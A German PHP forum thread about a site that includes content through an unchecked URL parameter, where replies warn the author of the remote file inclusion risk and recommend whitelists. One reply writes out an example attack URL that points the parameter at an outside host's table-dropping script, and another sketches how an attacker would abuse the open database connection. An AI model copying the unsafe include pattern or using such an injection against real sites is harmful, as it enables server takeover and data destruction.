[PHP] include

S

Stefan51278

Active member
ID: 51278
L
20 April 2006
26
0
Also, ich hab meine Seite so angelegt, dass der Inhalt automatisch über den Link includet wird.

Beispiel:

.../index.php?insert=test.php

Dann ist im Tabellenabschnitt des Inhalts die Datei test.php eingebunden.


Das Problem: Wenn die test.php jetzt z.B. einen link zur test2.php beinhaltet, so wird dann direkt die test2.php aufgerufen, das ganze Layout fehlt. Wie kann ich Links im Quellcode der includeten Datei automatisch so anpassen, dass diese wieder die index.php benutzen?

Also zum Beispiel der Link aus der test.php von
<a href"test2.php"...
in <a href"index.php?insert=test2.php...
geändert wird?
 
warum benutzt du nicht einfach den "richtigen" Link - also mit ?insert=test2.php ?

Ansonsten : mod_rewrite

smile
 
das wäre schon einmal eine möglichkeit, alles über die index.php einzubinden.
allerdings solltest du dann überprüfen ob die datei auch geöffnet werden darf. sonst könnte man da unanständige dinge includieren :-D
 
Ähm das ist jetzt nicht dein Ernst, oder?
Du weißt schon, dass man für solche Includes immer White-Lists benutzen sollte, da es sonst ein ziemliches Sicherheitsrisiko darstellt (irgendwo in den FAQs müsste auch ein Thread dazu rumliegen).

Zu deiner Frage: Du musst mittels Output Buffering die Ausgabe der eingebundenen Seite abfangen, Links mit Hilfe der String-Funktionen ersetzen und dann alles ausgeben.
 
Stefan51278 schrieb:
Also, ich hab meine Seite so angelegt, dass der Inhalt automatisch über den Link includet wird.

Beispiel:

.../index.php?insert=test.php
Zum Vergrößern anklicken....
Gibst du mir noch die Domain zu deinem Projekt ?
Ein kurzes
Code: 
/index.php?insert=https://www.thehacker.ws/crashhisserver_dropalltables.php
würde sicherlich Spaß machen :ugly:
... :wall:

Alternativ zu den bereits geposteten Vorschläge kannst du probieren, über $_SERVER['REQUEST_URI'] du prüfen ob index2.php wirklich direkt oder über den Frontcontroller geladen wird. Im ersteren Fall kannst du n Redirect machen.
Dürfte aber genauso dirty wie dein restlicher Code sein. Außerdem bin ich mir nicht ganz sicher, obs wirklich funktioniert. Aber probieren kannst du ja mal.
 
theHacker schrieb:
Gibst du mir noch die Domain zu deinem Projekt ?
Ein kurzes
Code: 
/index.php?insert=https://www.thehacker.ws/crashhisserver_dropalltables.php
würde sicherlich Spaß machen :ugly:
... :wall:

Alternativ zu den bereits geposteten Vorschläge kannst du probieren, über $_SERVER['REQUEST_URI'] du prüfen ob index2.php wirklich direkt oder über den Frontcontroller geladen wird. Im ersteren Fall kannst du n Redirect machen.
Dürfte aber genauso dirty wie dein restlicher Code sein. Außerdem bin ich mir nicht ganz sicher, obs wirklich funktioniert. Aber probieren kannst du ja mal.
Zum Vergrößern anklicken....

Stimmt!

Mein Leiber Gott - denke bitte mal über dein Sicherheitsloch nach. Das ist ech nicht böse gemeint. Aber oh jeeee!


Geh dann wenigstens die Dateien über eine SWITCH Schleife durch. Dir ist doch klar, dass über diese Methode jeder mit deinem Space machen kann was er möchte?

Grüsse Lukasz!
 
ABC schrieb:
Geh dann wenigstens die Dateien über eine SWITCH Schleife durch. Dir ist doch klar, dass über diese Methode jeder mit deinem Space machen kann was er möchte?
Zum Vergrößern anklicken....
Nicht nur mit dem Space ;)
Ich liege wohl zu 99% richtig, wenn ich annehme, dass die DB-Verbindung zum Zeitpunkt des Include schon initialisiert ist.

Ich hole mir einfach alle definierten Variablen und schon hab ich die Connection-ID und kann fleißig alle Daten einlesen, alle Tabelle löschen, MACHEN, WAS ICH WILL 8O
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben